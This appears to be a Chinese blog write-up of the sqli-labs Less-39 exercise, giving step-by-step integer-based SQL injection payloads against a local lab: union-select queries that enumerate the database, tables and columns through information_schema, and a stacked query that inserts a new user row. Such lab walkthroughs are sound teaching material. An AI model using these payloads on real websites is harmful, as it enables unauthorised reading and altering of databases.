首页 > 其他分享 >第39关--堆叠查询,整形注入

第39关--堆叠查询,整形注入

时间:2022-08-17 17:01:09浏览次数:60  
标签:39 -- 堆叠 0.1 --+ table id schema

  先进行判断是否存在注入:?id=1 and 1=1   接着?id=1 and 1=2进行判断找出注入点是整形还是字符型注入

 

 ?id=1 and 1=2--+  返回异常。说明是整形注入

 

 判断有多少列:?id=1 order by 1(2,3,4)一个个的执行下去

 

 查看回显点:?id=1 union select 1,2,3--+

 

 

 

 查询数据库名:http://127.0.0.1/sqli-labs-master/Less-39/?id=-1 union select 1,2,database()--+

 

 查询表名:http://127.0.0.1/sqli-labs-master/Less-39/?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database()--+

http://127.0.0.1/sqli-labs-master/Less-39/?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema='security'--+

http://127.0.0.1/sqli-labs-master/Less-39/?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479--+

 

 

查询列名:http://127.0.0.1/sqli-labs-master/Less-39/?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+

 

 

列名查询出来了,接着开始堆叠注入:?id=1;insert into users(id,username,password)values(16,'less39','aaaaa')

http://127.0.0.1/sqli-labs-master/Less-39/?id=1;insert into users(id,username,password) values ('16','less39','aaaaa')--+

 

 查询新插入的用户是否成功:可直接页面获取,或是数据库查询

 

标签:39,--,堆叠,0.1,--+,table,id,schema
From: https://www.cnblogs.com/linyu51/p/16595849.html

相关文章

  • 搜索细节
    #include<iostream>#include<math.h>usingnamespacestd;intx[20],n,k;boolisprime(intn){ints=sqrt(double(n));for(inti=2;i<=s;i++){if(......
  • Qt 解决报错 This application failed to start because it could not find or load t
    解决Qt5报错ThisapplicationfailedtostartbecauseitcouldnotfindorloadtheQtplatformpluginQT为了简化生成发布版本,特别提供了工具"windeplayqt.exe",这......
  • 看神州数码如何借助连接型CRM打破数据孤岛,让多系统发挥价值
     “为什么做SaaS?为什么做云?未来的系统和数据都是基于连接存在并运转的,一切没有连接、一切不在线的系统就是'死'系统,这在未来是没有价值的。秉承初心,乘势而上,在云+大......
  • 干货:Easy系列各视频平台云台控制功能的使用注意事项汇总
    TSINGSEE青犀视频旗下Easy系列视频平台,比如EasyCVR、EasyNVR、EasyGBS等,均可支持对摄像头的云台控制,包括摄像头的焦距调整、方向调整等。在视频监控场景中,摄像头的云台控制......
  • ENVIModeler建模工具重磅发布
    ENVIModeler系列文章ENVIModeler建模工具重磅发布 (介绍技术特点)ENVIModeler体验之构建工作流 (介绍建模方法)ENVIModeler体验之生成ENVI扩展工具 (介绍生成ENVI......
  • MGR 重要参数-group_replication_consistency
    参数group_replication_consistency共5个值可选:1.EVENTUAL:确保最终一致性,并不能保证数据实时同步。(MySQL8.0.14之前只有这一个选项)2.BEFORE:确保本地强一致性,并不......
  • kubernetes网络模型
    Overview本文将探讨Kubernetes中的网络模型,以及对各种网络模型进行分析。UnderlayNetworkModel什么是UnderlayNetwork底层网络UnderlayNetwork顾名思义是指网络......
  • js算法基础-栈结构的封装和进制转换
    先是栈结构的封装,使用es6的方式。#items为栈结构#表示类的私有属性,外部不能直接访问和修改。push压栈pop出栈peek查看栈顶isEmpty栈是否为空size栈内元素个数......
  • 三维建模软件Modo 16推荐
    强大的3D建模,纹理和渲染工具Modo16更新啦,modo16系列提供了增强型模型工具和工作流程,UI中嵌入的VR视口,迭代设计工作流程和改进的动画功能。Modo是强大而灵活的3D建模软件......
  • RESTful和RPC
    RESTful架构是对MVC架构改进后所形成的一种架构,通过使用事先定义好的接口与不同的服务联系起来。在RESTful架构中,【浏览器使用POST,DELETE,PUT和GET四种请求方式分别对指定的......